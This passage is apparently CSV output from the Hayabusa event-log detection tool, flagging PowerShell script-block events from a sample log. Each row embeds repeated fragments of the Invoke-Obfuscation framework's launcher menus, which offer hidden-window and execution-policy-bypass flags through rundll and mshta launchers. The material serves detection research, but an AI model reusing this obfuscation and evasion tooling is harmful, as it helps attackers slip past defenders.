23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_RUNDLL++} = @() ${MenuLevel_Launcher_RUNDLL++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '2' , '-NonInteractive'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,", @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '4')) ${MenuLevel_Launcher_VAR+} = @() ${MenuLevel_Launcher_VAR+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_STDIN+} = @() ${MenuLevel_Launcher_STDIN+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_CLIP+} = @() ${MenuLevel_Launcher_CLIP+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_VAR++} = @() ${MenuLevel_Launcher_VAR++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_STDIN++} = @() ${MenuLevel_Launcher_STDIN++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '0' , ""`tNO EXECUTION FLAGS"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '1' , ""`t-NoExit"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '2' , ""`t-NonInteractive"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '3' , ""`t-NoLogo"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '4' , ""`t-NoProfile"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '5' , ""`t-Command"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '6' , ""`t-WindowStyle Hidden"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '7' , ""`t-ExecutionPolicy Bypass"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '8' , ""`t-Wow64 (to path 32-bit powershell.exe)"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_CLIP++} = @() ${MenuLevel_Launcher_CLIP++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_RUNDLL++} = @() ${MenuLevel_Launcher_RUNDLL++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '2' , '-NonInteractive'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,", @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_MSHTA++} = @() ${MenuLevel_Launcher_MSHTA++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '12')) # Input options to display non-interactive menus or perform actions. 
$TutorialInputOptions = @(@('tutorial') , "" of how to use this tool `t "" ) $MenuInputOptionsShowHelp = @(@('help','get-help','?','-?','/?','menu'), ""Show this Menu `t "" ) $MenuInputOptionsShowOptions = @(@('show options','show','options') , "" for payload to obfuscate `t "" ) $ClearScreenInputOptions = @(@('clear','clear-host','cls') , "" screen `t "" ) $CopyToClipboardInputOptions = @(@('copy','clip','clipboard') , "" ObfuscatedCommand to clipboard `t "" ) $OutputToDiskInputOptions = @(@('out') , ""Write ObfuscatedCommand to disk `t "" ) $ExecutionInputOptions = @(@('exec','execute','test','run') , "" ObfuscatedCommand locally `t "" ) $ResetObfuscationInputOptions = @(@('reset') , "" ALL obfuscation for ObfuscatedCommand "") $UndoObfuscationInputOptions = @(@('undo') , "" LAST obfuscation for ObfuscatedCommand "") $BackCommandInputOptions = @(@('back','cd ..') , ""Go to previous obfuscation menu `t "" ) $ExitCommandInputOptions = @(@('quit','exit') , "" Invoke-Obfuscation `t "" ) $HomeMenuInputOptions = @(@('home','main') , ""Return to Menu `t "" ) # For Version 1.0 ASCII art is not necessary. #$ShowAsciiArtInputOptions = @(@('ascii') , ""Display random art for the lulz :)`t"") # Add all above input options lists to be displayed in SHOW OPTIONS menu. 
$AllAvailableInputOptionsLists = @() $AllAvailableInputOptionsLists += , $TutorialInputOptions $AllAvailableInputOptionsLists += , $MenuInputOptionsShowHelp $AllAvailableInputOptionsLists += , $MenuInputOptionsShowOptions $AllAvailableInputOptionsLists += , $ClearScreenInputOptions $AllAvailableInputOptionsLists += , $ExecutionInputOptions $AllAvailableInputOptionsLists += , $CopyToClipboardInputOptions $AllAvailableInputOptionsLists += , $OutputToDiskInputOptions $AllAvailableInputOptionsLists += , $ResetObfuscationInputOptions $AllAvailableInputOptionsLists += , $UndoObfuscationInputOptions $AllAvailableInputOptionsLists += , $BackCommandInputOptions $AllAvailableInputOptionsLists += , $ExitCommandInputOptions $AllAvailableInputOptionsLists += , $HomeMenuInputOptions # For Version 1.0 ASCII art is not necessary. #$AllAvailableInputOptionsLists += , $ShowAsciiArtInputOptions # Input options to change interactive menus. $ExitInputOptions = $ExitCommandInputOptions[0] $MenuInputOptions = $BackCommandInputOptions[0] # Obligatory ASCII Art. Show-AsciiArt Start-Sleep -Seconds 2 # Show Help Menu once at beginning of script. Show-HelpMenu # Main loop for user interaction. Show-Menu function displays current function along with acceptable input options (defined in arrays instantiated above). # User input and validation is handled within Show-Menu. $UserResponse = '' While($ExitInputOptions -NotContains ([String]$UserResponse).ToLower()) { $UserResponse = ([String]$UserResponse).Trim() If($HomeMenuInputOptions[0] -Contains ([String]$UserResponse).ToLower()) { $UserResponse = '' } # Display menu if it is defined in a menu variable with $UserResponse in the variable name. 
If(Test-Path ('Variable:' + ""MenuLevel$UserResponse"")) { $UserResponse = Show-Menu (Get-Variable ""MenuLevel$UserResponse"").Value $UserResponse $Script:OptionsMenu } Else { Write-Error ""The variable MenuLevel$UserResponse does not exist."" $UserResponse = 'quit' } If(($UserResponse -eq 'quit') -AND $CliWasSpecified -AND !$NoExitWasSpecified) { Write-Host ""`n`nOutputting ObfuscatedCommand to stdout and exiting since -Command was specified and -NoExit was not specified:`n"" Write-Output $Script:ObfuscatedCommand.Trim(""`n"") $UserInput = 'quit' } } } # Get location of this script no matter what the current directory is for the process executing this script. $ScriptDir = [System.IO.Path]::GetDirectoryName($myInvocation.MyCommand.Definition) Function Show-Menu { <# .SYNOPSIS HELPER FUNCTION :: Displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Menu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Menu displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. .PARAMETER Menu Specifies the menu options to display, with acceptable input options parsed out of this array. .PARAMETER MenuName Specifies the menu header display and the breadcrumb used in the interactive prompt display. .PARAMETER Script:OptionsMenu Specifies the script-wide variable containing additional acceptable input in addition to each menu's specific acceptable input (e.g. EXIT, QUIT, BACK, HOME, MAIN, etc.). .EXAMPLE C:\PS> Show-Menu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [ValidateNotNullOrEmpty()] [Object[]] $Menu, [String] $MenuName, [Object[]] $Script:OptionsMenu ) # Extract all acceptable values from $Menu. 
$AcceptableInput = @() $SelectionContainsCommand = $FALSE ForEach($Line in $Menu) { # If there are 4 items in each $Line in $Menu then the fourth item is a command to exec if selected. If($Line.Count -eq 4) { $SelectionContainsCommand = $TRUE } $AcceptableInput += ($Line[1]).Trim(' ') } $UserInput = $NULL While($AcceptableInput -NotContains $UserInput) { # Format custom breadcrumb prompt. Write-Host ""`n"" $BreadCrumb = $MenuName.Trim('_') If($BreadCrumb.Length -gt 1) { If($BreadCrumb.ToLower() -eq 'show options') { $BreadCrumb = 'Show Options' } If($MenuName -ne '') { # Handle specific case substitutions from what is ALL CAPS in interactive menu and then correct casing we want to appear in the Breadcrumb. $BreadCrumbOCD = @() $BreadCrumbOCD += , @('ps' ,'PS') $BreadCrumbOCD += , @('cmd' ,'Cmd') $BreadCrumbOCD += , @('wmic' ,'Wmic') $BreadCrumbOCD += , @('rundll' ,'RunDll') $BreadCrumbOCD += , @('var+' ,'Var+') $BreadCrumbOCD += , @('stdin+' ,'StdIn+') $BreadCrumbOCD += , @('clip+' ,'Clip+') $BreadCrumbOCD += , @('var++' ,'Var++') $BreadCrumbOCD += , @('stdin++' ,'StdIn++') $BreadCrumbOCD += , @('clip++' ,'Clip++') $BreadCrumbOCD += , @('rundll++','RunDll++') $BreadCrumbOCD += , @('mshta++' ,'Mshta++') $BreadCrumbArray = @() ForEach($Crumb in $BreadCrumb.Split('_')) { # Perform casing substitutions for any matches in $BreadCrumbOCD array. $StillLookingForSubstitution = $TRUE ForEach($Substitution in $BreadCrumbOCD) { If($Crumb.ToLower() -eq $Substitution[0]) { $BreadCrumbArray += $Substitution[1] $StillLookingForSubstitution = $FALSE } } # If no substitution occurred above then simply upper-case the first character and lower-case all the remaining characters. 
If($StillLookingForSubstitution) { $BreadCrumbArray += $Crumb.SubString(0,1).ToUppe",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,", @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_MSHTA++} = @() ${MenuLevel_Launcher_MSHTA++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '12')) # Input options to display non-interactive menus or perform actions. 
$TutorialInputOptions = @(@('tutorial') , "" of how to use this tool `t "" ) $MenuInputOptionsShowHelp = @(@('help','get-help','?','-?','/?','menu'), ""Show this Menu `t "" ) $MenuInputOptionsShowOptions = @(@('show options','show','options') , "" for payload to obfuscate `t "" ) $ClearScreenInputOptions = @(@('clear','clear-host','cls') , "" screen `t "" ) $CopyToClipboardInputOptions = @(@('copy','clip','clipboard') , "" ObfuscatedCommand to clipboard `t "" ) $OutputToDiskInputOptions = @(@('out') , ""Write ObfuscatedCommand to disk `t "" ) $ExecutionInputOptions = @(@('exec','execute','test','run') , "" ObfuscatedCommand locally `t "" ) $ResetObfuscationInputOptions = @(@('reset') , "" ALL obfuscation for ObfuscatedCommand "") $UndoObfuscationInputOptions = @(@('undo') , "" LAST obfuscation for ObfuscatedCommand "") $BackCommandInputOptions = @(@('back','cd ..') , ""Go to previous obfuscation menu `t "" ) $ExitCommandInputOptions = @(@('quit','exit') , "" Invoke-Obfuscation `t "" ) $HomeMenuInputOptions = @(@('home','main') , ""Return to Menu `t "" ) # For Version 1.0 ASCII art is not necessary. #$ShowAsciiArtInputOptions = @(@('ascii') , ""Display random art for the lulz :)`t"") # Add all above input options lists to be displayed in SHOW OPTIONS menu. 
$AllAvailableInputOptionsLists = @() $AllAvailableInputOptionsLists += , $TutorialInputOptions $AllAvailableInputOptionsLists += , $MenuInputOptionsShowHelp $AllAvailableInputOptionsLists += , $MenuInputOptionsShowOptions $AllAvailableInputOptionsLists += , $ClearScreenInputOptions $AllAvailableInputOptionsLists += , $ExecutionInputOptions $AllAvailableInputOptionsLists += , $CopyToClipboardInputOptions $AllAvailableInputOptionsLists += , $OutputToDiskInputOptions $AllAvailableInputOptionsLists += , $ResetObfuscationInputOptions $AllAvailableInputOptionsLists += , $UndoObfuscationInputOptions $AllAvailableInputOptionsLists += , $BackCommandInputOptions $AllAvailableInputOptionsLists += , $ExitCommandInputOptions $AllAvailableInputOptionsLists += , $HomeMenuInputOptions # For Version 1.0 ASCII art is not necessary. #$AllAvailableInputOptionsLists += , $ShowAsciiArtInputOptions # Input options to change interactive menus. $ExitInputOptions = $ExitCommandInputOptions[0] $MenuInputOptions = $BackCommandInputOptions[0] # Obligatory ASCII Art. Show-AsciiArt Start-Sleep -Seconds 2 # Show Help Menu once at beginning of script. Show-HelpMenu # Main loop for user interaction. Show-Menu function displays current function along with acceptable input options (defined in arrays instantiated above). # User input and validation is handled within Show-Menu. $UserResponse = '' While($ExitInputOptions -NotContains ([String]$UserResponse).ToLower()) { $UserResponse = ([String]$UserResponse).Trim() If($HomeMenuInputOptions[0] -Contains ([String]$UserResponse).ToLower()) { $UserResponse = '' } # Display menu if it is defined in a menu variable with $UserResponse in the variable name. 
If(Test-Path ('Variable:' + ""MenuLevel$UserResponse"")) { $UserResponse = Show-Menu (Get-Variable ""MenuLevel$UserResponse"").Value $UserResponse $Script:OptionsMenu } Else { Write-Error ""The variable MenuLevel$UserResponse does not exist."" $UserResponse = 'quit' } If(($UserResponse -eq 'quit') -AND $CliWasSpecified -AND !$NoExitWasSpecified) { Write-Host ""`n`nOutputting ObfuscatedCommand to stdout and exiting since -Command was specified and -NoExit was not specified:`n"" Write-Output $Script:ObfuscatedCommand.Trim(""`n"") $UserInput = 'quit' } } } # Get location of this script no matter what the current directory is for the process executing this script. $ScriptDir = [System.IO.Path]::GetDirectoryName($myInvocation.MyCommand.Definition) Function Show-Menu { <# .SYNOPSIS HELPER FUNCTION :: Displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Menu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Menu displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. .PARAMETER Menu Specifies the menu options to display, with acceptable input options parsed out of this array. .PARAMETER MenuName Specifies the menu header display and the breadcrumb used in the interactive prompt display. .PARAMETER Script:OptionsMenu Specifies the script-wide variable containing additional acceptable input in addition to each menu's specific acceptable input (e.g. EXIT, QUIT, BACK, HOME, MAIN, etc.). .EXAMPLE C:\PS> Show-Menu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [ValidateNotNullOrEmpty()] [Object[]] $Menu, [String] $MenuName, [Object[]] $Script:OptionsMenu ) # Extract all acceptable values from $Menu. 
$AcceptableInput = @() $SelectionContainsCommand = $FALSE ForEach($Line in $Menu) { # If there are 4 items in each $Line in $Menu then the fourth item is a command to exec if selected. If($Line.Count -eq 4) { $SelectionContainsCommand = $TRUE } $AcceptableInput += ($Line[1]).Trim(' ') } $UserInput = $NULL While($AcceptableInput -NotContains $UserInput) { # Format custom breadcrumb prompt. Write-Host ""`n"" $BreadCrumb = $MenuName.Trim('_') If($BreadCrumb.Length -gt 1) { If($BreadCrumb.ToLower() -eq 'show options') { $BreadCrumb = 'Show Options' } If($MenuName -ne '') { # Handle specific case substitutions from what is ALL CAPS in interactive menu and then correct casing we want to appear in the Breadcrumb. $BreadCrumbOCD = @() $BreadCrumbOCD += , @('ps' ,'PS') $BreadCrumbOCD += , @('cmd' ,'Cmd') $BreadCrumbOCD += , @('wmic' ,'Wmic') $BreadCrumbOCD += , @('rundll' ,'RunDll') $BreadCrumbOCD += , @('var+' ,'Var+') $BreadCrumbOCD += , @('stdin+' ,'StdIn+') $BreadCrumbOCD += , @('clip+' ,'Clip+') $BreadCrumbOCD += , @('var++' ,'Var++') $BreadCrumbOCD += , @('stdin++' ,'StdIn++') $BreadCrumbOCD += , @('clip++' ,'Clip++') $BreadCrumbOCD += , @('rundll++','RunDll++') $BreadCrumbOCD += , @('mshta++' ,'Mshta++') $BreadCrumbArray = @() ForEach($Crumb in $BreadCrumb.Split('_')) { # Perform casing substitutions for any matches in $BreadCrumbOCD array. $StillLookingForSubstitution = $TRUE ForEach($Substitution in $BreadCrumbOCD) { If($Crumb.ToLower() -eq $Substitution[0]) { $BreadCrumbArray += $Substitution[1] 